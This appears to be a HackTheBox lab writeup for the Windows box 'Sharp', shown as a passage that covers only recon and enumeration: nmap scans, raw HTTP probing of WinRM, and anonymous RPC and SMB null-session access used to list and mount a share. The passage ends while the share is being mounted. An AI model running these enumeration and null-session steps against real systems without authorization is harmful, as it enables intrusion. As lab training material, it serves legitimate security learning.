-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsharp.html
375 lines (334 loc) · 107 KB
/
sharp.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Sharp - HackTheBox Writeup (10.10.10.219) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Sharp - HackTheBox Writeup (10.10.10.219)">
<meta name="description" content="Hard-difficulty Windows box with a focus on reverse engineering C# applications and enumerating SMB shares. Foothold gained by reversing the encryption in a Kanban application. Privilege escalation by abusing WCF server and client applications ported from .NET remoting.">
<meta property="og:description" content="Hard-difficulty Windows box with a focus on reverse engineering C# applications and enumerating SMB shares. Foothold gained by reversing the encryption in a Kanban application. Privilege escalation by abusing WCF server and client applications ported from .NET remoting.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/2e0fd7a39dd00dcf9d0627019bee5c3d.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/2e0fd7a39dd00dcf9d0627019bee5c3d.png"></span>
</div>
<h1 class="Header__Title">Sharp - HackTheBox Writeup (10.10.10.219)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Mon, May 10, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Hard">Hard</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Windows">Windows</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--gray">
<a href="tag/Reversing">Reversing</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/SMB">SMB</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/.NET_Remoting">.NET Remoting</a>
</span>
</div>
<div>
Hard-difficulty Windows box with a focus on reverse engineering C# applications and enumerating SMB shares. Foothold gained by reversing the encryption in a Kanban application. Privilege escalation by abusing WCF server and client applications ported from .NET remoting.
</div>
</header>
<article id="https://www.notion.so/44be2b1639694d039f7966cee384b206" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/9e8fd2f3fc19443b8739f8252a976e76" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/9e8fd2f3fc19443b8739f8252a976e76"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/784038305b11493d909e873477116673" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/3144107efe2d4aaca17dc349234951b6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.219 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/84cedd3d27f64a22be97ebef03afb25e" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 17:09 ACDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds</span></span></span></code></pre><div id="https://www.notion.so/8d51da7304aa4c468dbfdc90418f2d7b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Scan failed, retrying with host discovery disabled.</span></span></p></div><div id="https://www.notion.so/3b06fa3623cb4940a5c0fc6de26cdc1c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.219 -Pn >> ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/f63837dc29c34e819022cecf30e5fb28" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
8888/tcp open sun-answerbook
8889/tcp open ddi-tcp-2</span></span></span></code></pre></li><li id="https://www.notion.so/0690b40daf1443deaafd8d086ebdcf6b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/be92f950dba84cfc92fc26f3b827627a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 135,139,445,5985,8888,8889 10.10.10.219 -Pn > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/841390627bbb4d0d994af0cdbae5033e" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open storagecraft-image StorageCraft Image Manager
8889/tcp open mc-nmf .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-04T06:47:38
|_ start_date: N/A</span></span></span></code></pre><div id="https://www.notion.so/efd226dc2e6f4bb6a0b86a91401b8106" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">RPC, SMB, HTTP/WinRM (?), StorageCraft Image Manager (?), .NET Message Framing.</span></span></p></div></li></ul><h2 id="https://www.notion.so/3edff4ae133747689ba7dc8c53fe5ff8" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/3edff4ae133747689ba7dc8c53fe5ff8"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/97d55c7b35b6467da534eae4be146a57" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP enumeration with netcat:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/534cf05477904249a40217b5a5cbd0f0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Connect to HTTP service:</span></span><div id="https://www.notion.so/e4f754003ca54e56bb98c35de0451850" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc 10.10.10.219 5985</code></span></span></p></div><div id="https://www.notion.so/976e06ea4a6b439a8c470b65eb7d16aa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">GET / HTTP/1.1</code></span></span></p></div><pre id="https://www.notion.so/7a4f34f4fc8e43bbb0af958f9fdecfd0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 04 Jan 2021 07:11:36 GMT
Connection: close
Content-Length: 334
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://www.w3.org/TR/html4/strict.dtd"><span>http://www.w3.org/TR/html4/strict.dtd</span></a></span><span class="SemanticString"><span>">
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HTML</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HEAD</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>TITLE</span><span class="token punctuation">></span></span>Bad Request<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>TITLE</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>META</span> <span class="token attr-name">HTTP-EQUIV</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">Content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text/html; charset=us-ascii<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HEAD</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>h2</span><span class="token punctuation">></span></span>Bad Request - Invalid Hostname<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>h2</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>hr</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>p</span><span class="token punctuation">></span></span>HTTP Error 400. The request hostname is invalid.<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>p</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HTML</span><span class="token punctuation">></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/73893af9178a4920b01593bc49269ba3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Header requires a hostname, let's try "sharp.htb" after adding its entry in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/3d30116c36a042e5b12e62c85ce0cbdb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc 10.10.10.219 5985</code></span></span></p></div><div id="https://www.notion.so/e459882187fd4248b607c0fdc065eb62" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">GET / HTTP/1.1</code></span></span></p></div><div id="https://www.notion.so/10cb048041874054b76f7a04ea25901f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Host: sharp.htb</code></span></span></p></div><pre id="https://www.notion.so/002ad663daeb42a48114187a2b6aef7b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 04 Jan 2021 07:18:17 GMT
Connection: close
Content-Length: 315
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://www.w3.org/TR/html4/strict.dtd"><span>http://www.w3.org/TR/html4/strict.dtd</span></a></span><span class="SemanticString"><span>">
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HTML</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HEAD</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>TITLE</span><span class="token punctuation">></span></span>Not Found<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>TITLE</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>META</span> <span class="token attr-name">HTTP-EQUIV</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">Content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text/html; charset=us-ascii<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HEAD</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>h2</span><span class="token punctuation">></span></span>Not Found<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>h2</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>hr</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>p</span><span class="token punctuation">></span></span>HTTP Error 404. The requested resource is not found.<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>p</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HTML</span><span class="token punctuation">></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/021c083c2a4d4cb7b09a9f832a1e0f8c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Voila, we can make a request! Let's see if /wsman exists:</span></span><div id="https://www.notion.so/64bcd12f4e4641b0bbeab60807d1ce43" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc 10.10.10.219 5985</code></span></span></p></div><div id="https://www.notion.so/1589d522f2e34aaa9e5d811f858f9832" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">POST /wsman HTTP/1.1</code></span></span></p></div><div id="https://www.notion.so/2af14fd09c9a41789e5f0fb437377c54" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Host: sharp.htb</code></span></span></p></div><pre id="https://www.notion.so/a64e2a243b7745bdaf9a6299f9579fc8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 04 Jan 2021 07:58:25 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://www.w3.org/TR/html4/strict.dtd"><span>http://www.w3.org/TR/html4/strict.dtd</span></a></span><span class="SemanticString"><span>">
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HTML</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>HEAD</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>TITLE</span><span class="token punctuation">></span></span>Length Required<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>TITLE</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>META</span> <span class="token attr-name">HTTP-EQUIV</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">Content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text/html; charset=us-ascii<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HEAD</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>h2</span><span class="token punctuation">></span></span>Length Required<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>h2</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span>hr</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>p</span><span class="token punctuation">></span></span>HTTP Error 411. The request must be chunked or have a content length.<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>p</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>BODY</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>HTML</span><span class="token punctuation">></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/f2f49a4942264bb186681ac4c2424184" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">With the response, we can confirm that port 5985 is a WinRM service.</span></span></li></ul><div id="https://www.notion.so/114d42a6a67d4688b4e0220a4fe9ba2c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">RPC enumeration with rpcclient:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/ae9b0815748f437c9c1a1d70a5a7d21e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Connect to RPC with blank credentials:</span></span><div id="https://www.notion.so/337923ab7ffb4db5a13a99ea68162bc8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rpcclient 10.10.10.219 -U "" -N</code></span></span></p></div><pre id="https://www.notion.so/41fe7e48818c4830a09cc22f63b1287b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>rpcclient $> _</span></span></span></code></pre></li><li id="https://www.notion.so/cfdc79d07ab24ce69d1d022011c4a2c6" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Anonymous logon is enabled, let's try to enumerate for machine info:</span></span><div id="https://www.notion.so/f8190d74440b41efb803e10b5add68f7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ srvinfo</code></span></span></p></div><pre id="https://www.notion.so/c4f21de6396f41e1b55bb4462f05d5e4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.219 Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003</span></span></span></code></pre></li><li id="https://www.notion.so/9565bb59382b42058055e06db3b7ab2d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">No access to other modules, moving on.</span></span></li></ul><div id="https://www.notion.so/a82062d9bfee46b19118e40458b5a889" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">SMB shares enumeration with smbclient:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/abc1ffdb1edf41eda3dac804ad1daa00" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Connecting with guest account:</span></span><div id="https://www.notion.so/2b7d4cd977ae4580b00fa9112934f8f0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ smbclient -L 10.10.10.219 -U guest%</code></span></span></p></div><pre id="https://www.notion.so/bb75a180aab745da8b04c3356f8d64cb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>session setup failed: NT_STATUS_ACCOUNT_DISABLED</span></span></span></code></pre></li><li id="https://www.notion.so/c005b24d217a47a2824148a529662801" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Guest account is disabled, let's try to list public shares with a null session:</span></span><div id="https://www.notion.so/2f5bd57ae0c14692bcfe5228540d6099" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ smbclient -L 10.10.10.219 -N</code></span></span></p></div><pre id="https://www.notion.so/81b4569f53364528872a1e98b15e0bcb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
dev Disk
IPC$ IPC Remote IPC
kanban Disk
SMB1 disabled -- no workgroup available</span></span></span></code></pre></li><li id="https://www.notion.so/b6a444f3ccb944a48c039b85b4f3b5ed" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found shares of interest: dev, kanban</span></span></li><li id="https://www.notion.so/cb2a1674f5524dde91072296d03d4dab" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">crackmapexec</code></span><span class="SemanticString"> to enumerate share permissions:</span></span><div id="https://www.notion.so/29ef9b48848c492bb0fcb1690df0c8e2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.10.219 -u '' -p '' --shares</code></span></span></p></div><pre id="https://www.notion.so/b0a45f57b6df476d8fe36aa79b862705" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.10.219 445 SHARP [*] Windows 10.0 Build 17763 x64 (name:SHARP) (domain:Sharp) (signing:False) (SMBv1:False)
SMB 10.10.10.219 445 SHARP [-] Sharp\: STATUS_ACCESS_DENIED
SMB 10.10.10.219 445 SHARP [+] Enumerated shares
SMB 10.10.10.219 445 SHARP Share Permissions Remark
SMB 10.10.10.219 445 SHARP ----- ----------- ------
SMB 10.10.10.219 445 SHARP ADMIN$ Remote Admin
SMB 10.10.10.219 445 SHARP C$ Default share
SMB 10.10.10.219 445 SHARP dev
SMB 10.10.10.219 445 SHARP IPC$ Remote IPC
SMB 10.10.10.219 445 SHARP kanban READ</span></span></span></code></pre></li><li id="https://www.notion.so/daf803135aa24bf2806a0c25e8efb931" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Seems like the null session was able to read the "kanban" share, so let's try to mount it:</span></span><div id="https://www.notion.so/6a147cbb7bee45e6a8fbc5ee8c0be470" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir mnt</code></span></span></p></div><div id="https://www.notion.so/146447b90e76405589af856955050b63" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo mount -t cifs -o username="",password="" //10.10.10.219/kanban ./mnt</code></span></span></p></div><pre id="https://www.notion.so/498a997eb4284cd3878dd5121cbe0b36" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>mount error(13): Permission denied</span></span></span></code></pre></li><li id="https://www.notion.so/7fe53a6e37f04ef7bdae6f76b73bc267" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Strange, maybe mount is not parsing the quote marks correctly. Try again but with a blank credentials file this time:</span></span><div id="https://www.notion.so/2df10efdcaf742b39031d5001c5e5fa4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo -e "username=\npassword=" > creds.smb</code></span></span></p></div><div id="https://www.notion.so/5b80658b7ed54b17a1652bd84c65e224" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo mount -t cifs -o credentials=./creds.smb //10.10.10.219/kanban ./mnt</code></span></span></p></div></li><li id="https://www.notion.so/f33f507a44e64fa2acd040088eb03f9b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">No errors, we can check the mount status by reading </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/proc/mounts</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/e2b0db235f4a435eab901cc1ab822bf9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /proc/mounts | grep kanban</code></span></span></p></div><pre id="https://www.notion.so/e356c6b0099a4d528fa70135116416a8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="notion://10.10.10.219/kanban"><span>//10.10.10.219/kanban</span></a></span><span class="SemanticString"><span> 